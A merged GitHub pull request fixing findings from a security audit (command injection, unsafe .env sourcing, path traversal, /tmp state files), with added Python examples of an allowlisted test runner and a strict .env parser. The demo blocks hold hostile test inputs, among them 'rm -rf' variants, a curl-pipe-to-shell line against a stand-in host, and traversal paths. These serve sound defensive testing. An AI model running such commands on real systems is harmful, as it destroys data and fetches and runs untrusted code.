
fix(security): remediate 2C/5M/6L findings from security audit#22

Merged: 0xNyk merged 1 commit into main from fix/security-audit-remediation on Mar 21, 2026

Conversation


0xNyk commented Mar 21, 2026

Owner

Summary

Full security audit remediation covering 2 critical, 5 high/medium, and 6 low severity findings across hooks, runners, configs, and CLI tools.

Critical Fixes

  • C1: Command injection via shell=True in stop quality gate — replaced with shlex.split() + shell=False, added test runner allowlist, removed /tmp command cache
  • C2: Shell injection in runner scripts — escaped all template substitutions with printf %q

High Fixes

  • H1: Predictable /tmp file paths — moved all hook state to ~/.lacp/hooks/state/ with 0700 dirs
  • H2: Unsafe .env sourcing — replaced source .env with strict KEY=VALUE parser (safe $HOME/~ expansion only)

Medium Fixes

  • M2: mcp-heavy profile now keeps server allowlist requirement enabled
  • M3: Enterprise policy pack now requires session fingerprint
  • M4: Install script hardcodes REPO_SLUG, adds optional SHA-256 checksum verification
  • M5: trusted-local-dev credential profile rejected when LACP_ALLOW_EXTERNAL_REMOTE=true

Low Fixes

  • L1: Session ID path traversal prevention via sanitization regex
  • L2: Debug log moved from world-readable /tmp to ~/.lacp/ with 0600 perms
  • L3: Provenance chain uses full SHA-256 (backward-compatible verify)
  • L4: Agent ID entropy increased from 32-bit to 128-bit
  • L5: Exfiltration check documented as defense-in-depth
  • L6: Personal vault path replaced with placeholder

Test plan

  • bin/lacp-test --quick passes
  • scripts/ci/test-hook-contracts.sh passes
  • All modified shell scripts pass bash -n syntax check
  • All modified JSON configs pass python3 -m json.tool validation
  • Session ID sanitization verified against path traversal payloads
  • Test runner allowlist verified against injection attempts
  • .env parser verified: expands $HOME/~, blocks $(...) injection
  • Existing provenance chain verifies intact with backward-compatible hash comparison
  • All Python hook modules import cleanly

🤖 Generated with Claude Code
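The C1 and L1 items above describe two patterns without showing them: running a configured test command through shlex.split() with shell=False behind a runner allowlist, and sanitising a session ID before it is embedded in a file path. The following is an added example modelling those two checks; it is not the project's stop_quality_gate.py or hook_contracts.py, and the allowlist contents, the regex, the `.json` suffix and the `~/.lacp/hooks/state` default are assumptions made for the illustration.

```python
"""Added example (not project code) modelling the C1 and L1 remediations."""
import re
import shlex
import subprocess
from pathlib import Path

# Assumption: the test-runner executables the quality gate is allowed to launch.
ALLOWED_TEST_RUNNERS = frozenset({"pytest", "npm", "pnpm", "go", "cargo", "make"})

# Assumption: session IDs are opaque tokens. Conservative charset, no path
# separators, no leading dot (which also rules out "." and ".."), max 128 chars.
SESSION_ID_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")

# Assumption: per-user state dir (the PR moved hook state out of /tmp).
DEFAULT_STATE_DIR = Path.home() / ".lacp" / "hooks" / "state"


class UnsafeInput(ValueError):
    """Raised for input that is rejected instead of executed or used in a path."""


def sanitize_session_id(raw: str) -> str:
    """Return the session ID unchanged if it is filesystem-safe, else raise."""
    if not SESSION_ID_RE.fullmatch(raw):
        raise UnsafeInput(f"rejected session id: {raw!r}")
    return raw


def session_state_path(state_dir: Path, session_id: str) -> Path:
    """State file for a session; the resolved path must stay inside state_dir."""
    path = (state_dir / f"{sanitize_session_id(session_id)}.json").resolve()
    if state_dir.resolve() not in path.parents:  # second line of defence
        raise UnsafeInput(f"path escaped state dir: {path}")
    return path


def default_state_path(session_id: str) -> Path:
    return session_state_path(DEFAULT_STATE_DIR, session_id)


def build_test_argv(command: str) -> list[str]:
    """Tokenise a configured test command into argv; no shell is ever involved.

    With shlex.split() metacharacters such as ';', '|', '&&' or '$(...)' are
    never interpreted: they either land in argv[0] (and fail the allowlist) or
    reach the runner as literal arguments.
    """
    try:
        argv = shlex.split(command)
    except ValueError as exc:  # unbalanced quotes and similar
        raise UnsafeInput(f"unparsable command {command!r}: {exc}") from exc
    if not argv:
        raise UnsafeInput("empty test command")
    # Only a bare program name is accepted: "/bin/sh", "./x" and "bash" all fail.
    if "/" in argv[0] or argv[0] not in ALLOWED_TEST_RUNNERS:
        raise UnsafeInput(f"test runner not in allowlist: {argv[0]!r}")
    return argv


def run_test_runner(command: str, cwd: Path, timeout: int = 600) -> int:
    """Run the allowlisted command with shell=False and return its exit code."""
    argv = build_test_argv(command)
    proc = subprocess.run(argv, shell=False, cwd=cwd, capture_output=True,
                          text=True, timeout=timeout, check=False)
    return proc.returncode


def verdict(command: str) -> str:
    """'allowed' or 'rejected' for a command, without executing anything."""
    try:
        build_test_argv(command)
    except UnsafeInput:
        return "rejected"
    return "allowed"


if __name__ == "__main__":
    # Constructed inputs: what a hook might read from a tampered config.
    for cmd in ("pytest -q tests/", "pytest; rm -rf ~",
                "bash -c 'curl h|sh'", 'pytest "$(id)"'):
        print(f"{cmd!r:28} -> {verdict(cmd)}")
    for sid in ("sess-20260321-ab12", "../../etc/passwd", ".hidden", "a/b"):
        try:
            print(sid, "->", default_state_path(sid))
        except UnsafeInput as exc:
            print(sid, "->", exc)
```

Note that `pytest "$(id)"` is accepted: the string `$(id)` is handed to pytest as a literal argument and is never expanded, which is exactly the property shell=False buys. The allowlist on argv[0] is what stops a config from naming `bash`, `sh` or an absolute path as the "test runner".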

…om audit

Critical:
- C1: Replace shell=True with shlex.split()+shell=False in stop quality gate,
  add test runner allowlist, remove /tmp command cache fallback
- C2: Escape shell metacharacters with printf %q in tmux/dmux/worktree runners

High:
- H1: Move all /tmp/lacp-* state to ~/.lacp/hooks/state/ with 0700 perms
- H2: Replace source .env with strict KEY=VALUE parser (safe $HOME expansion)

Medium:
- M2: Keep LACP_MCP_REQUIRE_SERVER_ALLOWLIST=true in mcp-heavy profile
- M3: Enable LACP_REQUIRE_SESSION_FINGERPRINT in enterprise policy pack
- M4: Hardcode REPO_SLUG in install.sh, add optional SHA-256 verification
- M5: Add constraints.reject_when_env guard to trusted-local-dev profile

Low:
- L1: Sanitize session IDs in file paths (hook_contracts.py, stop_quality_gate.py)
- L2: Move debug log to ~/.lacp/hooks/state/ with 0600 perms
- L3: Use full SHA-256 digest in provenance chain (backward-compatible verify)
- L4: Increase agent ID entropy from 32-bit to 128-bit
- L5: Document exfiltration check as defense-in-depth
- L6: Replace personal vault path with placeholder in obsidian manifest
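H2 replaces `source .env` (which executes whatever the file contains) with a strict KEY=VALUE parser that expands only `~` and `$HOME`. The following is an added example, not the project's parser, that models those rules in Python: one line per assignment, an optional `export` prefix, optional surrounding quotes, expansion of a leading `~` and of `$HOME`/`${HOME}` only, and a hard error on any other `$`, backtick or `$(...)`. The exact grammar and the sample file contents are assumptions.

```python
"""Added example (not project code) modelling the H2 strict .env parser."""
import os
import re
from typing import Dict, Optional

# KEY=VALUE with no whitespace around '='; an optional leading "export ".
LINE_RE = re.compile(r"^(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(.*)$")
# The only variable references that are ever expanded.
HOME_TOKEN_RE = re.compile(r"\$\{HOME\}|\$HOME\b")


class EnvParseError(ValueError):
    """Raised instead of silently skipping: a tampered .env must fail loudly."""


def _unquote(value: str) -> str:
    """Strip one matching pair of surrounding quotes; no escapes are processed."""
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
        return value[1:-1]
    return value


def expand_safe(value: str, home: str) -> str:
    """Expand `~`/`~/...` at the start and `$HOME`/`${HOME}` anywhere, nothing else."""
    # Check for forbidden syntax before substituting, so a HOME value that
    # happened to contain '$' could never be mistaken for injected text.
    leftover = HOME_TOKEN_RE.sub("", value)
    if "$" in leftover or "`" in leftover:
        raise EnvParseError(f"shell expansion not allowed in value: {value!r}")
    if value == "~" or value.startswith("~/"):
        value = home + value[1:]
    # A callable replacement keeps backslashes in `home` literal.
    return HOME_TOKEN_RE.sub(lambda _m: home, value)


def parse_env(text: str, home: Optional[str] = None) -> Dict[str, str]:
    """Parse .env text into a dict; any non-KEY=VALUE, non-comment line is an error."""
    home = os.path.expanduser("~") if home is None else home
    result: Dict[str, str] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            raise EnvParseError(f"line {lineno}: expected KEY=VALUE, got {raw!r}")
        key, value = m.group(1), _unquote(m.group(2).strip())
        result[key] = expand_safe(value, home)
    return result


def is_rejected(text: str, home: str = "/home/dev") -> bool:
    """True if the parser refuses the text (used for the injection checks)."""
    try:
        parse_env(text, home)
    except EnvParseError:
        return True
    return False


# Constructed sample .env, not a real file.
SAMPLE_ENV = """\
# constructed sample
LACP_API_URL=https://example.invalid/api
LACP_CACHE_DIR=~/.lacp/cache
LACP_LOG="$HOME/.lacp/hooks/state/debug.log"
export LACP_PROFILE=trusted-local-dev
EMPTY=
"""

if __name__ == "__main__":
    print(parse_env(SAMPLE_ENV, home="/home/dev"))
    for bad in ("X=$(curl http://evil.invalid/x | sh)", "Y=`id`",
                "Z=${OTHER_VAR}", "W=$HOMEY", "rm -rf /", "1BAD=x"):
        print(f"{bad!r:40} -> {'rejected' if is_rejected(bad) else 'accepted'}")
```

Two details worth keeping when porting this to shell: the forbidden-syntax check runs on the value with the allowed tokens removed, so `$HOMEY` and `$HOME_DIR` are rejected rather than partially expanded, and the parser raises on the first bad line instead of skipping it, since a silently ignored line is how an attacker-controlled `.env` would otherwise disable a setting.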
0xNyk merged commit 40f38d6 into main on Mar 21, 2026
0xNyk deleted the fix/security-audit-remediation branch on March 21, 2026 16:12